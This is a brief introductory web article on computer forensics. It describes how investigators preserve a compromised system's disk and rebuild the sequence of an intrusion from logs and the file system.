Basic Idea of Forensics Science in Computer Systems

The object of an informatics forensics analysis is to be able to rebuild, using all the resources,  through a facts log, the events that occurred since a computing system, that can be a Dedicated Server or a personal computer, was intact until it was detected that the system had been compromised.

To be able to perform this task, it is necessary trying to keep intact the information contained in the hard drive of a compromised system, at least as long as the most possible information can be recollected.

The information is collected from sources as registers (logs), the file system, and trying to rebuild the sequence of events in order to have a clear idea of the incident.

The forensics analysis ends when the forensic scientist has the knowledge of how the incident occurred, the identity of the possible attacker, the circumstances, source and origin, dates of the compromised event, the attacker's aim and how the facts sequence has been reconstructed.

Due to the fact that every incident is different normally is not possible to follow a series of established procedures by other forensic scientists, this means, a different order can be followed, and once the basic techniques are learned, new can be created from the previous ones.

To follow track of every step taken for the investigation on paper allows to observe procedures that have already been made and which are left to work on, helping with this to find more proofs or to investigate them, in a correct way in case that these have not been applied properly.

By: Carlos Castillo

This site use iBizCMS as the Free Content Management System | © 2009 All Rights Reserved by domaingrus.com